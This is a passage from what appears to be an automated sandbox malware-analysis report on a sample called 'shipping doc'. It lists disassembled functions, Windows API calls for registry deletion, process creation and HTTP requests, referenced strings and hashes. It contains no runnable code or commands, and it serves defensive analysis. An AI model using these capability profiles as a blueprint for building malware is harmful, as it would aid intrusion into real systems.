                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Cursor$Load$ErrorInfoLast
                                                                                              • String ID:
                                                                                              • API String ID: 3215588206-0
                                                                                              • Opcode ID: ea67b62a2bf36e619e6a7691ed731884c3ff0a9c9d5b9d8b6a8eb3dffa953223
                                                                                              • Instruction ID: 01ff8f6be4e7ea8501773101d5ea5b9012916ecde8da26e7766dd8335596c156
                                                                                              • Opcode Fuzzy Hash: ea67b62a2bf36e619e6a7691ed731884c3ff0a9c9d5b9d8b6a8eb3dffa953223
                                                                                              • Instruction Fuzzy Hash: C64152B0D04319AADB109FBA8C89C5EBFE8FF04754B50452AF51DEB681DB78A901CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 001000C6
                                                                                                • Part of subcall function 001000ED: InitializeCriticalSectionAndSpinCount.KERNEL32(001B070C,00000FA0,D62F3EBC,?,?,?,?,001223B3,000000FF), ref: 0010011C
                                                                                                • Part of subcall function 001000ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,001223B3,000000FF), ref: 00100127
                                                                                                • Part of subcall function 001000ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,001223B3,000000FF), ref: 00100138
                                                                                                • Part of subcall function 001000ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0010014E
                                                                                                • Part of subcall function 001000ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0010015C
                                                                                                • Part of subcall function 001000ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0010016A
                                                                                                • Part of subcall function 001000ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00100195
                                                                                                • Part of subcall function 001000ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 001001A0
                                                                                              • ___scrt_fastfail.LIBCMT ref: 001000E7
                                                                                                • Part of subcall function 001000A3: __onexit.LIBCMT ref: 001000A9
                                                                                              Strings
                                                                                              • InitializeConditionVariable, xrefs: 00100148
                                                                                              • WakeAllConditionVariable, xrefs: 00100162
                                                                                              • SleepConditionVariableCS, xrefs: 00100154
                                                                                              • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00100122
                                                                                              • kernel32.dll, xrefs: 00100133
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                              • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                              • API String ID: 66158676-1714406822
                                                                                              • Opcode ID: bcb9d9fe4eef3cd404c7bee336382256b594115fc9d50168703b1733b5fcae57
                                                                                              • Instruction ID: 993132fc186a7dcf1091552665ef7b7576b5737e6c1bdf0d2bbed8d25da51b9a
                                                                                              • Opcode Fuzzy Hash: bcb9d9fe4eef3cd404c7bee336382256b594115fc9d50168703b1733b5fcae57
                                                                                              • Instruction Fuzzy Hash: 8A21D732A44711ABD7226BA4EC09B6A73E4EB0DB51F10413EF98592AD1DFB09C808A90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                              • API String ID: 176396367-1603158881
                                                                                              • Opcode ID: 179ad100d4f6ee28ef322d11cdb27560991228b6888de21645b4094aa92b8cec
                                                                                              • Instruction ID: f74757e6687de5394914bf3b94d9aa88493bd7508bd139979ca53907a0f36c79
                                                                                              • Opcode Fuzzy Hash: 179ad100d4f6ee28ef322d11cdb27560991228b6888de21645b4094aa92b8cec
                                                                                              • Instruction Fuzzy Hash: B5E1F532A00516ABCB18DFB8C451AFDFBB1BF54710F558129E466F72A0DB70AE85C7A0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CharLowerBuffW.USER32(00000000,00000000,0017CC08), ref: 00154527
                                                                                              • _wcslen.LIBCMT ref: 0015453B
                                                                                              • _wcslen.LIBCMT ref: 00154599
                                                                                              • _wcslen.LIBCMT ref: 001545F4
                                                                                              • _wcslen.LIBCMT ref: 0015463F
                                                                                              • _wcslen.LIBCMT ref: 001546A7
                                                                                                • Part of subcall function 000FF9F2: _wcslen.LIBCMT ref: 000FF9FD
                                                                                              • GetDriveTypeW.KERNEL32(?,001A6BF0,00000061), ref: 00154743
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$BuffCharDriveLowerType
                                                                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                              • API String ID: 2055661098-1000479233
                                                                                              • Opcode ID: 92ea93bd273e93659e256ccaa342a2e21b5ba93348f73c4568c1ab52fa52cba7
                                                                                              • Instruction ID: 7f6e856b4de631f3f075f3386462a3e484d13df6fa5de1ca2c5f1163006a76ba
                                                                                              • Opcode Fuzzy Hash: 92ea93bd273e93659e256ccaa342a2e21b5ba93348f73c4568c1ab52fa52cba7
                                                                                              • Instruction Fuzzy Hash: 2DB11731608302DFC714DF28C890A6EB7E5AFA9759F50491DF8A6DB291E730D888CB52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 0016B198
                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0016B1B0
                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0016B1D4
                                                                                              • _wcslen.LIBCMT ref: 0016B200
                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0016B214
                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0016B236
                                                                                              • _wcslen.LIBCMT ref: 0016B332
                                                                                                • Part of subcall function 001505A7: GetStdHandle.KERNEL32(000000F6), ref: 001505C6
                                                                                              • _wcslen.LIBCMT ref: 0016B34B
                                                                                              • _wcslen.LIBCMT ref: 0016B366
                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0016B3B6
                                                                                              • GetLastError.KERNEL32(00000000), ref: 0016B407
                                                                                              • CloseHandle.KERNEL32(?), ref: 0016B439
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0016B44A
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0016B45C
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0016B46E
                                                                                              • CloseHandle.KERNEL32(?), ref: 0016B4E3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                              • String ID:
                                                                                              • API String ID: 2178637699-0
                                                                                              • Opcode ID: 7317f9c5d5619a8037100226bf036294ef9f14537ee7ea8fba0e55f74c52cd59
                                                                                              • Instruction ID: 553b57247031e4f75649cfac474f4afa8a24a14a803be5f95ef0a60ea4045185
                                                                                              • Opcode Fuzzy Hash: 7317f9c5d5619a8037100226bf036294ef9f14537ee7ea8fba0e55f74c52cd59
                                                                                              • Instruction Fuzzy Hash: 59F19C316083409FC714EF25C891B6EBBE5BF85314F14855DF99A9B2A2DB31EC84CB52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetMenuItemCount.USER32(001B1990), ref: 00122F8D
                                                                                              • GetMenuItemCount.USER32(001B1990), ref: 0012303D
                                                                                              • GetCursorPos.USER32(?), ref: 00123081
                                                                                              • SetForegroundWindow.USER32(00000000), ref: 0012308A
                                                                                              • TrackPopupMenuEx.USER32(001B1990,00000000,?,00000000,00000000,00000000), ref: 0012309D
                                                                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 001230A9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                              • String ID: 0
                                                                                              • API String ID: 36266755-4108050209
                                                                                              • Opcode ID: 0858dd086107522330e15863fb7814f3a78e45b52daf33d2269a2a1d61a2f70f
                                                                                              • Instruction ID: a5889727e1a3f433d674ad2cd97514d26f1a8a663b4e5825e452e0a47a78a805
                                                                                              • Opcode Fuzzy Hash: 0858dd086107522330e15863fb7814f3a78e45b52daf33d2269a2a1d61a2f70f
                                                                                              • Instruction Fuzzy Hash: C4710970644255BEEB258F25DD89F9EFF74FF05324F20421AF6246A1E0C7B1A960DB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • DestroyWindow.USER32(?,?), ref: 00176DEB
                                                                                                • Part of subcall function 000E6B57: _wcslen.LIBCMT ref: 000E6B6A
                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00176E5F
                                                                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00176E81
                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00176E94
                                                                                              • DestroyWindow.USER32(?), ref: 00176EB5
                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,000E0000,00000000), ref: 00176EE4
                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00176EFD
                                                                                              • GetDesktopWindow.USER32 ref: 00176F16
                                                                                              • GetWindowRect.USER32(00000000), ref: 00176F1D
                                                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00176F35
                                                                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00176F4D
                                                                                                • Part of subcall function 000F9944: GetWindowLongW.USER32(?,000000EB), ref: 000F9952
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                              • String ID: 0$tooltips_class32
                                                                                              • API String ID: 2429346358-3619404913
                                                                                              • Opcode ID: 38c0a017ec4ed4ab4e5d576dc279359041c67911f02c5be63d5c6cac66725b38
                                                                                              • Instruction ID: ca4bcc962021d8c591110835f67db24c4de683fc48fb694c9c8ad56d736c08d9
                                                                                              • Opcode Fuzzy Hash: 38c0a017ec4ed4ab4e5d576dc279359041c67911f02c5be63d5c6cac66725b38
                                                                                              • Instruction Fuzzy Hash: 40719870104240AFDB21DF28DC58FBABBF9FB89304F64451DF98997262CB70A989CB51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 000F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000F9BB2
                                                                                              • DragQueryPoint.SHELL32(?,?), ref: 00179147
                                                                                                • Part of subcall function 00177674: ClientToScreen.USER32(?,?), ref: 0017769A
                                                                                                • Part of subcall function 00177674: GetWindowRect.USER32(?,?), ref: 00177710
                                                                                                • Part of subcall function 00177674: PtInRect.USER32(?,?,00178B89), ref: 00177720
                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 001791B0
                                                                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 001791BB
                                                                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 001791DE
                                                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00179225
                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0017923E
                                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 00179255
                                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 00179277
                                                                                              • DragFinish.SHELL32(?), ref: 0017927E
                                                                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00179371
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                              • API String ID: 221274066-3440237614
                                                                                              • Opcode ID: 24e38da8cc2055dcba2d2f9e47aa360fb371f5ca8ad15d8c7144f792433fe7f1
                                                                                              • Instruction ID: c175fc12ba44e5de06dd467ef1e111e5621baf544f80a70efd26c8ce8b7c35d2
                                                                                              • Opcode Fuzzy Hash: 24e38da8cc2055dcba2d2f9e47aa360fb371f5ca8ad15d8c7144f792433fe7f1
                                                                                              • Instruction Fuzzy Hash: 1C616A71108340AFD701EF65DC85DAFBBF8EF89750F40491DF599921A1DB309A89CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0015C4B0
                                                                                              • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0015C4C3
                                                                                              • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0015C4D7
                                                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0015C4F0
                                                                                              • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0015C533
                                                                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0015C549
                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0015C554
                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0015C584
                                                                                              • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0015C5DC
                                                                                              • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0015C5F0
                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0015C5FB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                              • String ID:
                                                                                              • API String ID: 3800310941-3916222277
                                                                                              • Opcode ID: 48bf768ead4b87177f1c9785e038d63d546fb1da28a95b040c9d5f4cf178e312
                                                                                              • Instruction ID: e2377fef73dccc9acc40b9738946a7dc29bdde38b2ce92af0f8fad943cf4abda
                                                                                              • Opcode Fuzzy Hash: 48bf768ead4b87177f1c9785e038d63d546fb1da28a95b040c9d5f4cf178e312
                                                                                              • Instruction Fuzzy Hash: FD514EB1600305FFDB218FA4C988AAB7BBCFF04755F00441DF9559A650EB34EA889BE0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00178592
                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 001785A2
                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000), ref: 001785AD
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 001785BA
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 001785C8
                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 001785D7
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 001785E0
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 001785E7
                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 001785F8
                                                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,0017FC38,?), ref: 00178611
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00178621
                                                                                              • GetObjectW.GDI32(?,00000018,000000FF), ref: 00178641
                                                                                              • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00178671
                                                                                              • DeleteObject.GDI32(00000000), ref: 00178699
                                                                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 001786AF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                              • String ID:
                                                                                              • API String ID: 3840717409-0
                                                                                              • Opcode ID: adec125103b3121600268d521965c8a9f737b371c8a38a73a3e3652304a82637
                                                                                              • Instruction ID: 8ead94e9e204b43fa6b8a2c0b5837f0353fcbb73e9ea1190455a0f1b59d220e7
                                                                                              • Opcode Fuzzy Hash: adec125103b3121600268d521965c8a9f737b371c8a38a73a3e3652304a82637
                                                                                              • Instruction Fuzzy Hash: C841F975640205BFDB119FA5DC8CEAA7BB8FF89B15F148158F909E7260DB309981CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • VariantInit.OLEAUT32(00000000), ref: 00151502
                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 0015150B
                                                                                              • VariantClear.OLEAUT32(?), ref: 00151517
                                                                                              • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 001515FB
                                                                                              • VarR8FromDec.OLEAUT32(?,?), ref: 00151657
                                                                                              • VariantInit.OLEAUT32(?), ref: 00151708
                                                                                              • SysFreeString.OLEAUT32(?), ref: 0015178C
                                                                                              • VariantClear.OLEAUT32(?), ref: 001517D8
                                                                                              • VariantClear.OLEAUT32(?), ref: 001517E7
                                                                                              • VariantInit.OLEAUT32(00000000), ref: 00151823
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                              • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                              • API String ID: 1234038744-3931177956
                                                                                              • Opcode ID: abcb3b66616e219f787356660f96771aa6ebfdf16eb80496b7eb0a090eded31e
                                                                                              • Instruction ID: 8ebb2930df1ce84b92d018ee967df7be479b0c092721841e2193a24ca80803b9
                                                                                              • Opcode Fuzzy Hash: abcb3b66616e219f787356660f96771aa6ebfdf16eb80496b7eb0a090eded31e
                                                                                              • Instruction Fuzzy Hash: DED12331A00105EFDB05AF65D885BBDB7B1BF46701F11805AF826AF581EB34DC49DBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 000E9CB3: _wcslen.LIBCMT ref: 000E9CBD
                                                                                                • Part of subcall function 0016C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0016B6AE,?,?), ref: 0016C9B5
                                                                                                • Part of subcall function 0016C998: _wcslen.LIBCMT ref: 0016C9F1
                                                                                                • Part of subcall function 0016C998: _wcslen.LIBCMT ref: 0016CA68
                                                                                                • Part of subcall function 0016C998: _wcslen.LIBCMT ref: 0016CA9E
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0016B6F4
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0016B772
                                                                                              • RegDeleteValueW.ADVAPI32(?,?), ref: 0016B80A
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0016B87E
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0016B89C
                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0016B8F2
                                                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0016B904
                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 0016B922
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 0016B983
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0016B994
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                              • API String ID: 146587525-4033151799
